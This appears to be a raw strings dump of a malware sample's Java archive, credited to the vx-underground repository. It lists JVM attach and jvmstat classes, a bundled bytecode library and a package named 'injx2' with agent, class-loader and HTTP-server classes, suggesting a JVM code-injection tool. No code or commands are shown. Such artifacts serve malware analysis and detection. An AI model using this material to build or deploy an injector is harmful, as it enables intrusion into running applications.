00000003B37D 0 !:MCU 00000003B386 00000003B386 0 9[Vm% 00000003B3D2 00000003B3D2 0 {aB1# 00000003B559 00000003B559 0 6ahCTB# 00000003B692 00000003B692 0 ly%;% 00000003B6A9 00000003B6A9 0 $Q &[ 00000003B738 00000003B738 0 ol[;+ 00000003B7EA 00000003B7EA 0 sun/jvmstat/perfdata/monitor/AliasFileParser$Token.classUT 00000003B82C 00000003B82C 0 %z\ux 00000003B8CB 00000003B8CB 0 x>QZhg* 00000003B92A 00000003B92A 0 L$@YX(F 00000003B9AC 00000003B9AC 0 sun/jvmstat/perfdata/monitor/AbstractPerfDataBufferPrologue.classUT 00000003B9F7 00000003B9F7 0 %z\ux 00000003BA1B 00000003BA1B 0 (P1M/ 00000003BA54 00000003BA54 0 8>3~g7 00000003BA92 00000003BA92 0 ptd&2: 00000003BC04 00000003BC04 0 ZP4}{ 00000003BE57 00000003BE57 0 Om)%tf 00000003BE8D 00000003BE8D 0 1,c'g 00000003BED6 00000003BED6 0 p/=Sv< 00000003BF7B 00000003BF7B 0 -Tfk7 00000003BFE3 00000003BFE3 0 sun/jvmstat/perfdata/monitor/AbstractPerfDataBuffer.classUT 00000003C026 00000003C026 0 %z\ux 00000003C082 00000003C082 0 8~p<7 00000003C0FC 00000003C0FC 0 [fQ@d 00000003C118 00000003C118 0 $~kJ7 00000003C124 00000003C124 0 :nPL9m 00000003C1F3 00000003C1F3 0 7jYGI 00000003C22E 00000003C22E 0 8:>Em 00000003C292 00000003C292 0 uw-m! 00000003C2B7 00000003C2B7 0 VDLD\ 00000003C2FD 00000003C2FD 0 5:i[g 00000003C44B 00000003C44B 0 ABzx4 00000003C4AF 00000003C4AF 0 @R /% 00000003C54F 00000003C54F 0 V!BcX) 00000003C565 00000003C565 0 Oh8?# 00000003C5BD 00000003C5BD 0 sun/jvmstat/perfdata/monitor/AbstractMonitoredVm.classUT 00000003C5FD 00000003C5FD 0 %z\ux 00000003C6C8 00000003C6C8 0 vnkYT 00000003C722 00000003C722 0 7dIqN 00000003C75F 00000003C75F 0 Sze[( 00000003C854 00000003C854 0 8L!0C 00000003C93D 00000003C93D 0 sun/jvmstat/perfdata/monitor/v2_0/TypeCode.classUT 00000003C977 00000003C977 0 %z\ux 00000003CA3E 00000003CA3E 0 WhI.U 00000003CC80 00000003CC80 0 EUM8C 00000003CC89 00000003CC89 0 nC8Y- 00000003CD3D 00000003CD3D 0 sun/jvmstat/perfdata/monitor/v2_0/PerfDataBufferPrologue.classUT File pos Mem pos ID Text ======== ======= == ==== 00000003CD85 00000003CD85 0 %z\ux 00000003CE3A 00000003CE3A 0 %}F,T 00000003CE8D 00000003CE8D 0 dXHUU} 00000003CE97 00000003CE97 0 ]$>[U 00000003D005 00000003D005 0 RV4Y7 00000003D0C2 00000003D0C2 0 RhFia 00000003D105 00000003D105 0 89xrQ;O# 00000003D353 00000003D353 0 l6j7p 00000003D37C 00000003D37C 0 sun/jvmstat/perfdata/monitor/protocol/local/PerfDataFile.classUT 00000003D3C4 00000003D3C4 0 %z\ux 00000003D4CF 00000003D4CF 0 4=yv_ 00000003D50B 00000003D50B 0 *UtL/e;~ 00000003D51D 00000003D51D 0 k3I1 00000003D60C 00000003D60C 0 jg/].S 00000003D79D 00000003D79D 0 6Di0T3U 00000003DA54 00000003DA54 0 sun/jvmstat/perfdata/monitor/protocol/local/PerfDataBuffer.classUT 00000003DA9E 00000003DA9E 0 %z\ux 00000003DBB9 00000003DBB9 0 XTLrU0 00000003DC41 00000003DC41 0 MU/MTU 00000003DCC6 00000003DCC6 0 n/O1hY 00000003DD85 00000003DD85 0 gf<&r 00000003DE65 00000003DE65 0 j0fw1 00000003DF6C 00000003DF6C 0 sun/jvmstat/perfdata/monitor/protocol/local/MonitoredHostProvider.classUT 00000003DFBD 00000003DFBD 0 %z\ux 00000003E11A 00000003E11A 0 HY4[;fXA 00000003E134 00000003E134 0 z&lLZ 00000003E19E 00000003E19E 0 =3>hP 00000003E3D7 00000003E3D7 0 -d3*5 00000003E3FE 00000003E3FE 0 JLC/F5l 00000003E40F 00000003E40F 0 HhhGR 00000003E681 00000003E681 0 FLP+C 00000003E6B8 00000003E6B8 0 -R)ZL 00000003E78F 00000003E78F 0 bN0e0 00000003E7A1 00000003E7A1 0 sun/jvmstat/perfdata/monitor/protocol/local/MonitoredHostProvider$NotifierTask.classUT 00000003E7FF 00000003E7FF 0 %z\ux 00000003E821 00000003E821 0 _(V,-e( 00000003E922 00000003E922 0 ekq+O 00000003E9A3 00000003E9A3 0 o[A u 00000003EA64 00000003EA64 0 +MV3Y. 00000003EB7F 00000003EB7F 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager.classUT 00000003EBC9 00000003EBC9 0 %z\ux 00000003EC6B 00000003EC6B 0 :u]5: 00000003ED3D 00000003ED3D 0 1:!GK[Z\ 00000003EDAB 00000003EDAB 0 :r~nr 00000003EDFF 00000003EDFF 0 >>6NVEmNbd 00000003EE5E 00000003EE5E 0 EnQB=vIX 00000003EF06 00000003EF06 0 6.A 7 00000003F0EC 00000003F0EC 0 $jEQj 00000003F12F 00000003F12F 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager$3.classUT 00000003F17B 00000003F17B 0 %z\ux 00000003F27B 00000003F27B 0 )Ou,R 00000003F2CB 00000003F2CB 0 ]!U,{ 00000003F386 00000003F386 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager$2.classUT 00000003F3D2 00000003F3D2 0 %z\ux 00000003F43B 00000003F43B 0 -Cm7Q 00000003F463 00000003F463 0 |UdCi 00000003F483 00000003F483 0 kSq$x 00000003F5DC 00000003F5DC 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager$1.classUT 00000003F628 00000003F628 0 %z\ux 00000003F678 00000003F678 0 }i-yn{ File pos Mem pos ID Text ======== ======= == ==== 00000003F68A 00000003F68A 0 f(5[{ 00000003F834 00000003F834 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalMonitoredVm.classUT 00000003F880 00000003F880 0 %z\ux 00000003F9DE 00000003F9DE 0 L5m$R 00000003FA0B 00000003FA0B 0 %)TKA 00000003FA4B 00000003FA4B 0 XBz-s 00000003FB78 00000003FB78 0 F1exQC 00000003FE93 00000003FE93 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalMonitoredVm$NotifierTask.classUT 00000003FEEC 00000003FEEC 0 %z\ux 00000004008C 00000004008C 0 4HxfA 000000040282 000000040282 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalEventTimer.classUT 0000000402CD 0000000402CD 0 %z\ux 000000040358 000000040358 0 XC-aw* 000000040432 000000040432 0 META-INF/UT 000000040441 000000040441 0 %z\ux 000000040481 000000040481 0 META-INF/MANIFEST.MFPK 0000000404C3 0000000404C3 0 conf/PK 0000000404F6 0000000404F6 0 dynamic/PK 00000004052C 00000004052C 0 injx2/UT 000000040537 000000040537 0 }#z\ux 000000040578 000000040578 0 injx2/Agent$KRunnable.classPK 0000000405C1 0000000405C1 0 injx2/Agent.classPK 000000040600 000000040600 0 injx2/Global.classPK 000000040640 000000040640 0 injx2/HTTPServ$MyHandler$dispen.classPK 000000040693 000000040693 0 injx2/HTTPServ$MyHandler.classPK 0000000406DF 0000000406DF 0 injx2/HTTPServ.classPK 000000040721 000000040721 0 injx2/INJX.classPK 00000004075F 00000004075F 0 injx2/ViewClassLoader.classPK 0000000407A8 0000000407A8 0 injx2/javassist/UT 0000000407BE 0000000407BE 0 #z\ux 0000000407FE 0000000407FE 0 injx2/javassist/bytecode/UT 00000004081D 00000004081D 0 #z\ux 00000004085D 00000004085D 0 com/UT 000000040867 000000040867 0 %z\ux 0000000408A7 0000000408A7 0 com/sun/UT 0000000408B5 0000000408B5 0 %z\ux 0000000408F5 0000000408F5 0 com/sun/tools/UT 000000040909 000000040909 0 %z\ux 000000040949 000000040949 0 com/sun/tools/attach/UT 000000040964 000000040964 0 %z\ux 0000000409A4 0000000409A4 0 com/sun/tools/attach/AttachPermission.classUT 000000040A15 000000040A15 0 com/sun/tools/attach/AttachNotSupportedException.classUT 000000040A91 000000040A91 0 com/sun/tools/attach/AgentLoadException.classUT 000000040B04 000000040B04 0 com/sun/tools/attach/AgentInitializationException.classUT 000000040B81 000000040B81 0 com/sun/tools/attach/spi/UT 000000040BA0 000000040BA0 0 %z\ux 000000040BE0 000000040BE0 0 sun/UT 000000040BEA 000000040BEA 0 %z\ux 000000040C2A 000000040C2A 0 sun/tools/UT 000000040C3A 000000040C3A 0 %z\ux 000000040C7A 000000040C7A 0 sun/jvmstat/UT 000000040C8C 000000040C8C 0 %z\ux 000000040CCC 000000040CCC 0 sun/tools/attach/UT 000000040CE3 000000040CE3 0 1z\ux 000000040D23 000000040D23 0 sun/tools/attach/WindowsVirtualMachine.classUT 000000040D95 000000040D95 0 sun/tools/attach/WindowsAttachProvider.classUT 000000040E07 000000040E07 0 sun/tools/attach/HotSpotVirtualMachine.classUT 000000040E79 000000040E79 0 sun/tools/attach/WindowsVirtualMachine$PipedInputStream.classUT 000000040EBC 000000040EBC 0 1z\ux 000000040EFC 000000040EFC 0 sun/jvmstat/monitor/UT File pos Mem pos ID Text ======== ======= == ==== 000000040F16 000000040F16 0 %z\ux 000000040F56 000000040F56 0 sun/jvmstat/perfdata/UT 000000040F71 000000040F71 0 %z\ux 000000040FB1 000000040FB1 0 sun/jvmstat/monitor/remote/UT 000000040FD2 000000040FD2 0 %z\ux 000000041012 000000041012 0 sun/jvmstat/perfdata/monitor/UT 000000041035 000000041035 0 %z\ux 000000041075 000000041075 0 sun/jvmstat/perfdata/monitor/protocol/UT 0000000410A1 0000000410A1 0 %z\ux 0000000410E1 0000000410E1 0 sun/jvmstat/perfdata/monitor/v2_0/UT 000000041109 000000041109 0 %z\ux 000000041149 000000041149 0 sun/jvmstat/perfdata/monitor/v2_0/PerfDataBuffer.classUT 0000000411C5 0000000411C5 0 sun/jvmstat/perfdata/monitor/protocol/local/UT 0000000411F7 0000000411F7 0 %z\ux 000000041237 000000041237 0 META-INF/services/UT 00000004124F 00000004124F 0 %z\ux 00000004128F 00000004128F 0 META-INF/services/com.sun.tools.attach.spi.AttachProviderUT 00000004130E 00000004130E 0 META-INF/services/com.sun.tools.internal.xjc.PluginUT 000000041387 000000041387 0 META-INF/services/com.sun.mirror.apt.AnnotationProcessorFactoryUT 0000000413EB 0000000413EB 0 rzB#n 00000004140C 00000004140C 0 META-INF/services/com.sun.jdi.connect.spi.TransportServiceUT 00000004148C 00000004148C 0 META-INF/services/com.sun.jdi.connect.ConnectorUT 000000041501 000000041501 0 injx2/javassist/NotFoundException.classUT 00000004152E 00000004152E 0 #z\ux 00000004154E 00000004154E 0 bNC7V7 00000004156E 00000004156E 0 injx2/javassist/JarClassPath.classUT 000000041596 000000041596 0 #z\ux 0000000415D6 0000000415D6 0 injx2/javassist/DirClassPath.classUT 0000000415FE 0000000415FE 0 #z\ux 00000004163E 00000004163E 0 injx2/javassist/CtPrimitiveType.classUT 000000041669 000000041669 0 #z\ux 0000000416A9 0000000416A9 0 injx2/javassist/CtMethod.classUT 0000000416CD 0000000416CD 0 #z\ux 00000004170D 00000004170D 0 injx2/javassist/CtMember$Cache.classUT 000000041737 000000041737 0 #z\ux 000000041777 000000041777 0 injx2/javassist/CtMember.classUT 00000004179B 00000004179B 0 #z\ux 0000000417DB 0000000417DB 0 injx2/javassist/CtField.classUT 0000000417FE 0000000417FE 0 #z\ux 00000004183E 00000004183E 0 injx2/javassist/CtConstructor.classUT 000000041867 000000041867 0 #z\ux 0000000418A7 0000000418A7 0 injx2/javassist/CtClassType.classUT 0000000418CE 0000000418CE 0 #z\ux 00000004190E 00000004190E 0 injx2/javassist/CtClass.classUT 000000041931 000000041931 0 #z\ux 000000041971 000000041971 0 injx2/javassist/CtBehavior.classUT 000000041997 000000041997 0 #z\ux 0000000419D7 0000000419D7 0 injx2/javassist/ClassPoolTail.classUT 000000041A00 000000041A00 0 #z\ux 000000041A40 000000041A40 0 injx2/javassist/ClassPool$1.classUT 000000041A67 000000041A67 0 #z\ux 000000041AA7 000000041AA7 0 injx2/javassist/ClassPool.classUT 000000041ACC 000000041ACC 0 #z\ux 000000041B0C 000000041B0C 0 injx2/javassist/ClassPathList.classUT 000000041B35 000000041B35 0 #z\ux 000000041B75 000000041B75 0 injx2/javassist/ClassPath.classUT 000000041B9A 000000041B9A 0 #z\ux 000000041BBA 000000041BBA 0 bN']6O 000000041BDA 000000041BDA 0 injx2/javassist/ClassClassPath.classUT 000000041C04 000000041C04 0 #z\ux File pos Mem pos ID Text ======== ======= == ==== 000000041C44 000000041C44 0 injx2/javassist/bytecode/Utf8Info.classUT 000000041C71 000000041C71 0 #z\ux 000000041CB1 000000041CB1 0 injx2/javassist/bytecode/StringInfo.classUT 000000041CE0 000000041CE0 0 #z\ux 000000041D20 000000041D20 0 injx2/javassist/bytecode/StackMapTable.classUT 000000041D52 000000041D52 0 #z\ux 000000041D92 000000041D92 0 injx2/javassist/bytecode/SourceFileAttribute.classUT 000000041DCA 000000041DCA 0 #z\ux 000000041E0A 000000041E0A 0 injx2/javassist/bytecode/Opcode.classUT 000000041E35 000000041E35 0 #z\ux 000000041E75 000000041E75 0 injx2/javassist/bytecode/NameAndTypeInfo.classUT 000000041EA9 000000041EA9 0 #z\ux 000000041EE9 000000041EE9 0 injx2/javassist/bytecode/MethodrefInfo.classUT 000000041F1B 000000041F1B 0 #z\ux 000000041F5B 000000041F5B 0 injx2/javassist/bytecode/MethodInfo.classUT 000000041F8A 000000041F8A 0 #z\ux 000000041FCA 000000041FCA 0 injx2/javassist/bytecode/MemberrefInfo.classUT 000000041FFC 000000041FFC 0 #z\ux 00000004203C 00000004203C 0 injx2/javassist/bytecode/LongVector.classUT 00000004206B 00000004206B 0 #z\ux 0000000420AB 0000000420AB 0 injx2/javassist/bytecode/LocalVariableAttribute.classUT 0000000420E6 0000000420E6 0 #z\ux 000000042126 000000042126 0 injx2/javassist/bytecode/LineNumberAttribute.classUT 00000004215E 00000004215E 0 #z\ux 00000004219E 00000004219E 0 injx2/javassist/bytecode/FieldrefInfo.classUT 0000000421CF 0000000421CF 0 #z\ux 00000004220F 00000004220F 0 injx2/javassist/bytecode/FieldInfo.classUT 00000004223D 00000004223D 0 #z\ux 00000004225D 00000004225D 0 bNB\eHm 00000004227D 00000004227D 0 injx2/javassist/bytecode/ExceptionTableEntry.classUT 0000000422B5 0000000422B5 0 #z\ux 0000000422F5 0000000422F5 0 injx2/javassist/bytecode/ExceptionTable.classUT 000000042328 000000042328 0 #z\ux 000000042368 000000042368 0 injx2/javassist/bytecode/ExceptionsAttribute.classUT 0000000423A0 0000000423A0 0 #z\ux 0000000423E0 0000000423E0 0 injx2/javassist/bytecode/Descriptor.classUT 00000004240F 00000004240F 0 #z\ux 00000004244F 00000004244F 0 injx2/javassist/bytecode/ConstPool.classUT 00000004247D 00000004247D 0 #z\ux 0000000424BD 0000000424BD 0 injx2/javassist/bytecode/ConstInfo.classUT 0000000424EB 0000000424EB 0 #z\ux 00000004252B 00000004252B 0 injx2/javassist/bytecode/CodeAttribute.classUT 00000004255D 00000004255D 0 #z\ux 00000004259D 00000004259D 0 injx2/javassist/bytecode/ClassInfo.classUT 0000000425CB 0000000425CB 0 #z\ux 00000004260B 00000004260B 0 injx2/javassist/bytecode/ClassFile.classUT 000000042639 000000042639 0 #z\ux 000000042679 000000042679 0 injx2/javassist/bytecode/AttributeInfo.classUT 0000000426AB 0000000426AB 0 #z\ux 0000000426EB 0000000426EB 0 com/sun/tools/attach/VirtualMachineDescriptor.classUT 000000042744 000000042744 0 bNw7j 000000042764 000000042764 0 com/sun/tools/attach/VirtualMachine.classUT 0000000427D3 0000000427D3 0 com/sun/tools/attach/spi/AttachProvider.classUT 000000042846 000000042846 0 sun/tools/attach/HotSpotAttachProvider.classUT 0000000428B8 0000000428B8 0 sun/tools/attach/HotSpotAttachProvider$HotSpotVirtualMachineDescriptor.classUT 00000004294A 00000004294A 0 sun/jvmstat/monitor/VmIdentifier.classUT 0000000429B6 0000000429B6 0 sun/jvmstat/monitor/StringMonitor.classUT 000000042A23 000000042A23 0 sun/jvmstat/monitor/MonitorException.classUT 000000042A93 000000042A93 0 sun/jvmstat/monitor/MonitoredVmUtil.classUT 000000042AE2 000000042AE2 0 bNm98Lm File pos Mem pos ID Text ======== ======= == ==== 000000042B02 000000042B02 0 sun/jvmstat/monitor/MonitoredVm.classUT 000000042B6D 000000042B6D 0 sun/jvmstat/monitor/MonitoredHost.classUT 000000042BDA 000000042BDA 0 sun/jvmstat/monitor/Monitor.classUT 000000042C41 000000042C41 0 sun/jvmstat/monitor/LongMonitor.classUT 000000042CAC 000000042CAC 0 sun/jvmstat/monitor/IntegerMonitor.classUT 000000042D1A 000000042D1A 0 sun/jvmstat/monitor/HostIdentifier.classUT 000000042D88 000000042D88 0 sun/jvmstat/monitor/ByteArrayMonitor.classUT 000000042DF8 000000042DF8 0 sun/jvmstat/monitor/AbstractMonitor.classUT 000000042E67 000000042E67 0 sun/jvmstat/monitor/remote/BufferedMonitoredVm.classUT 000000042EE1 000000042EE1 0 sun/jvmstat/perfdata/monitor/SyntaxException.classUT 000000042F59 000000042F59 0 sun/jvmstat/perfdata/monitor/PerfStringVariableMonitor.classUT 000000042FDB 000000042FDB 0 sun/jvmstat/perfdata/monitor/PerfStringMonitor.classUT 000000043035 000000043035 0 bNAnT:{ 000000043055 000000043055 0 sun/jvmstat/perfdata/monitor/PerfStringConstantMonitor.classUT 0000000430D7 0000000430D7 0 sun/jvmstat/perfdata/monitor/PerfLongMonitor.classUT 00000004314F 00000004314F 0 sun/jvmstat/perfdata/monitor/PerfIntegerMonitor.classUT 0000000431AA 0000000431AA 0 bNOwSG 0000000431CA 0000000431CA 0 sun/jvmstat/perfdata/monitor/PerfDataBufferImpl.classUT 000000043245 000000043245 0 sun/jvmstat/perfdata/monitor/PerfByteArrayMonitor.classUT 0000000432C2 0000000432C2 0 sun/jvmstat/perfdata/monitor/MonitorVersionException.classUT 000000043342 000000043342 0 sun/jvmstat/perfdata/monitor/MonitorTypeException.classUT 0000000433BF 0000000433BF 0 sun/jvmstat/perfdata/monitor/MonitorStructureException.classUT 000000043441 000000043441 0 sun/jvmstat/perfdata/monitor/MonitorDataException.classUT 0000000434BE 0000000434BE 0 sun/jvmstat/perfdata/monitor/CountedTimerTask.classUT 000000043537 000000043537 0 sun/jvmstat/perfdata/monitor/AliasFileParser.classUT 0000000435AF 0000000435AF 0 sun/jvmstat/perfdata/monitor/AliasFileParser$Token.classUT 00000004362D 00000004362D 0 sun/jvmstat/perfdata/monitor/AbstractPerfDataBufferPrologue.classUT 0000000436B4 0000000436B4 0 sun/jvmstat/perfdata/monitor/AbstractPerfDataBuffer.classUT 000000043733 000000043733 0 sun/jvmstat/perfdata/monitor/AbstractMonitoredVm.classUT 0000000437AF 0000000437AF 0 sun/jvmstat/perfdata/monitor/v2_0/TypeCode.classUT 000000043825 000000043825 0 sun/jvmstat/perfdata/monitor/v2_0/PerfDataBufferPrologue.classUT 0000000438A9 0000000438A9 0 sun/jvmstat/perfdata/monitor/protocol/local/PerfDataFile.classUT 00000004392D 00000004392D 0 sun/jvmstat/perfdata/monitor/protocol/local/PerfDataBuffer.classUT 0000000439B3 0000000439B3 0 sun/jvmstat/perfdata/monitor/protocol/local/MonitoredHostProvider.classUT 000000043A20 000000043A20 0 bN0e0 000000043A40 000000043A40 0 sun/jvmstat/perfdata/monitor/protocol/local/MonitoredHostProvider$NotifierTask.classUT 000000043ADA 000000043ADA 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager.classUT 000000043B60 000000043B60 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager$3.classUT 000000043BE8 000000043BE8 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager$2.classUT 000000043C70 000000043C70 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager$1.classUT 000000043CF8 000000043CF8 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalMonitoredVm.classUT 000000043D80 000000043D80 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalMonitoredVm$NotifierTask.classUT 000000043E15 000000043E15 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalEventTimer.classUT 000000002322 000000002322 0 VS_VERSION_INFO 00000000237E 00000000237E 0 StringFileInfo 0000000023A2 0000000023A2 0 000004b0 0000000023BA 0000000023BA 0 CompanyName 0000000023D4 0000000023D4 0 Sun Microsystems, Inc. 00000000240A 00000000240A 0 FileDescription 00000000242C 00000000242C 0 Java(TM) Platform SE binary 00000000246A 00000000246A 0 FileVersion 000000002484 000000002484 0 6.0.450.6 00000000249E 00000000249E 0 Full Version 0000000024B8 0000000024B8 0 1.6.0_45-b06 0000000024DA 0000000024DA 0 InternalName 0000000024F4 0000000024F4 0 attach 00000000250A 00000000250A 0 LegalCopyright 00000000253E 00000000253E 0 2013 000000002552 000000002552 0 OriginalFilename 000000002574 000000002574 0 attach.dll File pos Mem pos ID Text ======== ======= == ==== 000000002592 000000002592 0 ProductName 0000000025AC 0000000025AC 0 Java(TM) Platform SE 6 U45 0000000025EA 0000000025EA 0 ProductVersion 000000002608 000000002608 0 6.0.450.6 000000002622 000000002622 0 VarFileInfo 000000002642 000000002642 0 Translation 00000000AF5B 00000000AF5B 0 Td\g[i]f 00000000B0F1 00000000B0F1 0 naoeqf
=== DOWNLOAD === Mirror provided by vx-underground.org, thx!